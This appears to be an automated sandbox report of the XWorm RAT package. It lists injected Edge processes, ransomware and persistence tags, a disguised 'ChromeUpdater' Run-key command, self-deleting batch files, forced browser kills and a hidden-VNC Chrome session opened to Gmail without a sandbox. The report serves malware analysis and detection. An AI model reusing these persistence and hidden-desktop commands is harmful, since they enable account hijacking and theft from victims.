PID 1408 wrote to memory of 3476 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4112 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4112 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4924 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f73cb8,0x7ff9a5f73cc8,0x7ff9a5f73cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3332 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2976 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"

C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,6621933232261600070,12641724830154208073,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4620 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 1908"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"

C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9AFE.tmp.bat

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2132"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"

C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe

"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c taskkill /F /IM brave.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c taskkill /F /IM msedge.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c taskkill /F /IM firefox.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c taskkill /F /IM opera.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f69778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1556 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3216 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3232 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4560 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4780 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5176 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1564 --field-trial-handle=1808,i,10112424543028398433,16074871790133538112,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" " https://mail.google.com" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Pandora --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff9a5f69758,0x7ff9a5f69768,0x7ff9a5f69778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1720 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1920 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --no-sandbox --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --mojo-platform-channel-handle=1984 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --first-renderer-process --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2672 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Pandora" --display-capture-permissions-policy-allowed --no-sandbox --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2700 --field-trial-handle=1980,i,11509329092172963005,3959318290650349946,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

